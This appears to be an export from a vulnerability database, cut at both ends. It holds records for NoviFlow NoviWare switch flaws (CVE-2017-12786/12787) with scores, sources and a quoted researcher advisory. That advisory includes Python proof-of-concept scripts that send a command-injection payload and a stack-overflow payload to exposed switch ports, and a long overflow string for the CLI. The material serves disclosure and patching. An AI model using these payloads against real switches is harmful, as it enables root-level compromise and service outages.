        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:noviflow:noviware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Francois Goichon",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-12787",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2017-12787",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-29534",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2017-12787",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-12787",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-12787",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-29534",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201708-457",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-12787",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. NoviFlowNoviWareNW400.2.6 and previous versions and noviSwitch devices have a security vulnerability in the network interface of novi_process_manager_daemon. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. 
\n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. \n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. 
\n\n\nCVE-2017-12785\n==============\nCli breakout in novish\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to a buffer\noverflow and a command injection, allowing authenticated,\nlow-privileged users to break out of the CLI and execute commands as\nroot. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. 
\n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-12787",
        "trust": 3.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "42518",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315",
        "trust": 0.8
      },
      {
        "db": "EXPLOITDB",
        "id": "42518",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143818",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "id": "VAR-201708-1147",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      }
    ],
    "trust": 0.92692307
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      }
    ]
  },
  "last_update_date": "2025-04-20T23:04:26.294000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NoviWare",
        "trust": 0.8,
        "url": "https://noviflow.com/products/noviware/"
      },
      {
        "title": "Patch for NoviFlowNoviWare and NoviSwitch device remote code execution vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/103387"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "https://www.exploit-db.com/exploits/42518/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12787"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "date": "2017-08-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "date": "2017-08-18T23:44:44",
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "date": "2017-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "date": "2017-08-22T17:29:00.270000",
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-29534"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12787"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      },
      {
        "date": "2017-08-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      },
      {
        "date": "2025-04-20T01:37:25.860000",
        "db": "NVD",
        "id": "CVE-2017-12787"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NoviWare Buffer error vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007315"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-457"
      }
    ],
    "trust": 0.6
  }
}

VAR-201708-1146

Vulnerability from variot - Updated: 2025-04-20 23:04

Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare contains a buffer error vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). NoviFlow NoviWare and NoviSwitch devices are products of NoviFlow Canada. NoviSwitch devices are a series of switch devices. NoviWare is the switch software used in them. A stack buffer overflow vulnerability exists in the network interface for the cliengine and noviengine services in NoviFlow NoviWare NW400.2.6 and earlier versions and in NoviSwitch devices. A remote attacker could exploit the vulnerability to execute code with root privileges.

NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities

Introduction

NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant switch software developed by NoviFlow and available for license to network equipment manufacturers. Multiple vulnerabilities were identified in the NoviWare software deployed on NoviSwitch devices.

CVEs

  • CVE-2017-12784: remote code execution in novi_process_manager_daemon Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

  • CVE-2017-12785: cli breakout in novish Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)

  • CVE-2017-12786: remote code execution in noviengine and cliengine Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Affected versions

NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version is deployed

Author

François Goichon - Google Security Team

CVE-2017-12784

Remote code execution in novi_process_manager_daemon

Summary

The NoviWare switching software distribution is prone to two distinct bugs which could potentially allow a remote, unauthenticated attacker to gain privileged (root) code execution on the switch device.

  • A flaw when applying ACL changes requested from the CLI could expose the novi_process_manager_daemon network service
  • This network service is prone to command injection and a stack-based buffer overflow

Reproduction

If TCP port 2020 is accepting connections from the network, the following Python script can be used to ping yourself on vulnerable versions:


from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, 2020))

payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00"
s.sendall(pack("<II", 1, len(payload)+8))
s.sendall(payload)

s.close()

On vulnerable versions, the appliance will perform an ICMP request to the specified IP, which can be observed in network logs.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

CVE-2017-12785

Cli breakout in novish

Summary

The NoviWare switching software distribution is prone to a buffer overflow and a command injection, allowing authenticated, low-privileged users to break out of the CLI and execute commands as root.

Reproduction

Log in to the appliance via SSH and run the following command from the CLI:

noviswitch# show log cli username AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --

If the appliance is vulnerable, the cli crashes and the session ends.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.
  • A flaw when applying ACL changes requested from the CLI could expose noviengine and cliengine network services
  • These network services are prone to a stack-based buffer overflow when unpacking serialized values.

Reproduction

If TCP ports 9090 or 12345 are accepting connections from the network, the following Python script can be used to cause a crash on vulnerable versions:


from struct import pack
import socket

s = socket.socket()
s.connect((<switch host>, <9090 or 12345>))

payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)])
payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload
s.sendall(payload)

s.read(1)
s.close()


A watchdog should restart the service if it has crashed.

Remediation

  • Upgrade to NoviWare400 3.0 or later.
  • NoviFlow customers should have received instructions on how to get the latest release along with release notes. For more information, contact support@noviflow.com.

Disclosure timeline

2017/05/11 - Report sent to NoviFlow
2017/05/26 - Bugs acknowledged and remediation timeline confirmed
2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities
2017/08/09 - CVE requests
2017/08/16 - Public disclosure

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1146",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "noviflow",
        "version": "400.2.6"
      },
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "noviflow",
        "version": "nw400.2.6"
      },
      {
        "model": "noviware \u003c=nw400.2.6",
        "scope": null,
        "trust": 0.6,
        "vendor": "noviflow",
        "version": null
      },
      {
        "model": "noviware",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "noviflow",
        "version": "400.2.6"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:noviflow:noviware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Francois Goichon",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2017-12786",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2017-12786",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-29532",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2017-12786",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-12786",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2017-12786",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-29532",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201708-458",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-12786",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
